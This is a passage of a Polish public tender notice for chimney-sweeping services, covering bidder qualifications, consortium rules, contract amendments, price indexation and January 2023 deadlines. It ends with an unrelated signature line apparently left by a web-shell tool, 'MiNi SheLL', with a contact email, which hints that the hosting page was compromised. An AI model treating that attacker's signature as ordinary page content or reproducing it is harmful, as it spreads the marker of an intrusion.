class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w terminie wykonania robót zleconych zleceniem, o którym mowa w § 5 ust. 1 wzoru umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W odniesieniu do warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej (art. 112 ust. 2<br/>pkt 3 ustawy) Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności, na sumę ubezpieczenia nie mniejszą niż 120.000,00 zł.<br/>2. W odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (art. 112 ust. 2 pkt<br/>4 ustawy) Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki umożliwiające realizację zamówienia na<br/>odpowiednim poziomie jakości, poprzez:<br/>1) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w<br/>tym okresie wykonał lub wykonuje należycie co najmniej 2 usługi, w tym co najmniej jedną świadczoną ciągle, przez okres<br/>co najmniej 6 miesięcy, wg stanu na dzień składania ofert, polegające na świadczeniu usług kominiarskich, które<br/>realizowane były w wielorodzinnych budynkach mieszkalnych, lokalach użytkowych, budynkach użyteczności publicznej, o<br/>łącznej wartości brutto nie mniejszej niż 150.000,00 PLN, (wartość brutto zawartych umów).<br/>2) dysponuje co najmniej 4 osobami, które będą uczestniczyć w wykonaniu zamówienia, w tym co najmniej:<br/>a) 1 osobą posiadająca kwalifikacje – uprawnienia o specjalności mistrz kominiarski;<br/>b) 1 osobą, która będzie uczestniczyć w realizacji zamówienia posiadająca świadectwo kwalifikacyjne (E) i (D) uprawniające<br/>do zajmowania się eksploatacja urządzeń, instalacji gazowych.<br/>c) minimum 2 osobami (pracownikami) przewidzianymi do realizacji zamówienia z kwalifikacjami w zawodzie kominiarza lub<br/>z co najmniej 2-letnia praktyka zawodową w wykonywaniu usług kominiarskich lub praktyka w wykonywaniu usług<br/>związanych z czyszczeniem, odgruzowywaniem kominów, montażem drzwiczek, sprawdzaniem przewodów kominowych<br/>itp.<br/>Wymóg winien być spełniony odrębnie dla każdej z części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający nie wymaga<br/>w niniejszym postępowaniu złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia.<br/>2. Potwierdzeniem braku podstaw do wykluczenia Wykonawcy z postępowania jest oświadczenie, o którym mowa w Rozdziale VI §<br/>1 ust. 1 pkt 3.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Zamawiający nie wymaga w niniejszym postępowaniu złożenia podmiotowych środków dowodowych na potwierdzenie spełnienia<br/>warunków udziału w postępowaniu.<br/>2. Potwierdzeniem spełnienia przez Wykonawcę warunków udziału w postępowaniu oraz braku podstaw do wykluczenia jest<br/>oświadczenie, o którym mowa w Rozdziale VI § 1 ust. 1 pkt 3.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku powinni spełniać warunki udziału w<br/>postępowaniu oraz złożyć dokumenty potwierdzające spełnienie tych warunków zgodnie z zapisami zawartymi w Rozdziale<br/>VI i VII Specyfikacji. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania<br/>ich w postępowaniu<br/>i zawarcia umowy. Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą,<br/>będą zobowiązani przedstawić Zamawiającemu przed zawarciem umowy stosowne porozumienie (umowę konsorcjum)<br/>zawierające w swojej treści co najmniej następujące postanowienia:<br/>1) skład konsorcjum nie może zostać zmieniony bez uprzedniej zgody Zamawiającego w toku niniejszego postępowania o<br/>udzielenie zamówienia, jak również przez cały okres wykonywania umowy,<br/>2) Wykonawcy tworzący konsorcjum będą solidarnie odpowiedzialni wobec Zamawiającego zarówno co do udziału w<br/>postępowaniu o udzielenie zamówienia, jak i w umowie zawartej w postępowaniu,<br/>3) wszyscy członkowie konsorcjum ponoszą solidarną, niczym nie ograniczoną odpowiedzialność prawną za wykonanie<br/>umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w pkt 12 oferty wskazują, które usługi wykonają<br/>poszczególni wykonawcy.<br/>3. Zamawiający określa szczególny, obiektywnie uzasadniony, sposób spełniania przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu:<br/>1) warunek określony w § 2 ust. 1 pkt 1 niniejszego rozdziału będzie uznany za spełniony, jeżeli co najmniej jeden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże posiadanie łącznego doświadczenia określonego<br/>w tym warunku (tj. Zamawiający nie dopuszcza możliwości sumowania doświadczenia Wykonawców) i wykona usługi do<br/>realizacji których te zdolności są wymagane;<br/>2) warunek określony w § 2 ust. 1 pkt 2 niniejszego rozdziału będzie uznany za spełniony, jeżeli jeden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia wykaże, że samodzielnie dysponuje wymaganym potencjałem osobowym i wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W oparciu o postanowienia art. 455 ust. 1 pkt 1 ustawy Zamawiający przewiduje możliwość następujących zmian umowy<br/>bez konieczności przeprowadzenia nowego postępowania:<br/>1) w zakresie wysokości określonego w § 10 ust. 2 wynagrodzenia, spowodowanych:<br/>a) zmianą stawki podatku od towarów i usług – w części obejmującej wynagrodzenie brutto za usługi niezbędne do<br/>wykonania przedmiotu umowy, wykonane od dnia obowiązywania nowej stawki podatku, bez zmiany wartości netto<br/>wynagrodzenia, z zastrzeżeniem postanowień przepisów wprowadzających nową stawkę podatku,<br/>b) zmianą zakresu rzeczowego przedmiotu umowy na warunkach określonych w § 8,<br/>2) zmiany spowodowane przyczynami zewnętrznymi, niezależnymi od Zamawiającego oraz Wykonawcy skutkującymi<br/>niemożliwością wykonania usługi na warunkach określonych w umowie (w szczególności spowodowane zmianami<br/>obowiązującego prawa w zakresie przedmiotu zamówienia, interwencjami mieszkańców, instytucji miejskich lub innych<br/>instytucji państwowych),<br/>3) gdy zmiana jest korzystna dla Zamawiającego, w szczególności gdy obniży to koszty wykonywanych usług albo skróci<br/>czas realizacji poszczególnych zleceń, zgłoszeń,<br/>4) gdy zmiana jest spowodowana decyzjami właściwych organów administracji publicznej, w tym administracji zespolonej, w<br/>szczególności organów nadzoru budowlanego czy służby ochrony zabytków,<br/>5) zmiany osób wskazanych w § 3,<br/>6) wskazania nowego podwykonawcy bądź zmiany wskazanych w § 7 podwykonawców lub zakresu robót wykonywanych<br/>przez aktualnych podwykonawców,<br/>7) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się<br/>podwykonawcą doprowadzi do poprawienia jakości lub skrócenia czasu wykonywania poszczególnych zleceń, zgłoszeń.<br/>2. Postanowienia umowne zmienione z naruszeniem art. 454 i 455 podlegają unieważnieniu. Na miejsce unieważnionych<br/>postanowień umowy wchodzą postanowienia umowne w pierwotnym brzmieniu, zgodnie z postanowieniami art. 458 ustawy.<br/>3. Jeżeli Zamawiający zamierza zmienić warunki realizacji zamówienia, które wykraczają poza zmiany umowy dopuszczalne<br/>zgodnie z art. 454 i 455 ustawy, obowiązany jest przeprowadzić nowe postępowanie o udzielenie zamówienia, zgodnie z<br/>postanowieniami art. 454 ustawy.<br/>4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią<br/>jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>5. Zamawiający przewiduje możliwość dokonania następujących zmian umowy, bez konieczności sporządzania aneksu do<br/>umowy, w przypadku:<br/>1) zmiany danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana dokumentów potwierdzających<br/>wykonanie robót),<br/>2) zmiany danych adresowych.<br/>[c.d. w rubryce &#34;Informacje dodatkowe&#34;] <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostepnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawców jest dostępna dla nich na miniPortalu, w szczególności danego postepowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 6.	Waloryzacja będzie się odbywać w oparciu o wskaźnik cen producentów usług związanych <br/>z obsługą działalności gospodarczej publikowany przez Prezesa Głównego Urzędu Statystycznego w Biuletynie Statystycznym GUS przewidziany dla rodzaju działalności objętego zakresem przedmiotu niniejszej umowy, na stronie internetowej Urzędu („Wskaźnik”). W przypadku likwidacji Wskaźnika, zastosowanie znajdą inne, najbardziej zbliżone, wskaźniki publikowane przez Prezesa GUS.<br/>7.	Pierwsza waloryzacja może zostać dokonana nie wcześniej niż po 6 miesiącach od zawarcia umowy i będzie obliczona w oparciu o średnią arytmetyczną ze Wskaźnika za okres (uwzględniający pełne miesiące kalendarzowe, za które opublikowany został Wskaźnik), który upłynął od dnia zawarcia Umowy. Kolejne waloryzacje mogą być dokonane nie częściej niż co kwartał, w oparciu o średnią arytmetyczną ze Wskaźnika za okres, który upłynął od poprzedniej waloryzacji. Zmiana Wskaźnika w stosunku do jego wartości z ostatniej waloryzacji nie więcej niż o 2% nie będzie stanowiła podstawy do zmiany wartości wynagrodzenia umownego.<br/>8.	Przez zmianę ceny materiałów lub kosztów rozumie się wzrost odpowiednio cen lub kosztów, jak i ich obniżenie, względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie.<br/>9.	Łączna wartość korekt (wartość wzrostu lub spadku wynagrodzenia umownego) wynikająca <br/>z waloryzacji nie powinna przekroczyć +/- 5 % wynagrodzenia umownego.<br/>10.	W przypadku wzrostu lub obniżenia Wskaźnika waloryzacji, waloryzacja będzie polegała odpowiednio na wzroście lub obniżeniu wynagrodzenia za usługi realizowane po dniu złożenia wniosku. Waloryzacja nie dotyczy usług zrealizowanych przed datą złożenia wniosku przez którąkolwiek ze Stron.<br/>11.	Inicjatorem zmian może być Zamawiający lub Wykonawca. Do wniosku o zmianę wynagrodzenia mają zastosowanie przepisy ust. 6 – 10 niniejszego paragrafu.<br/>12.	Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z postanowieniami niniejszego paragrafu zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki:<br/>1)	przedmiotem umowy są usługi;<br/>2)	okres obowiązywania umowy przekracza 6 miesięcy.<br/>13.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem postanowień ust. 5.

Creat By MiNi SheLL
Email: jattceo@gmail.com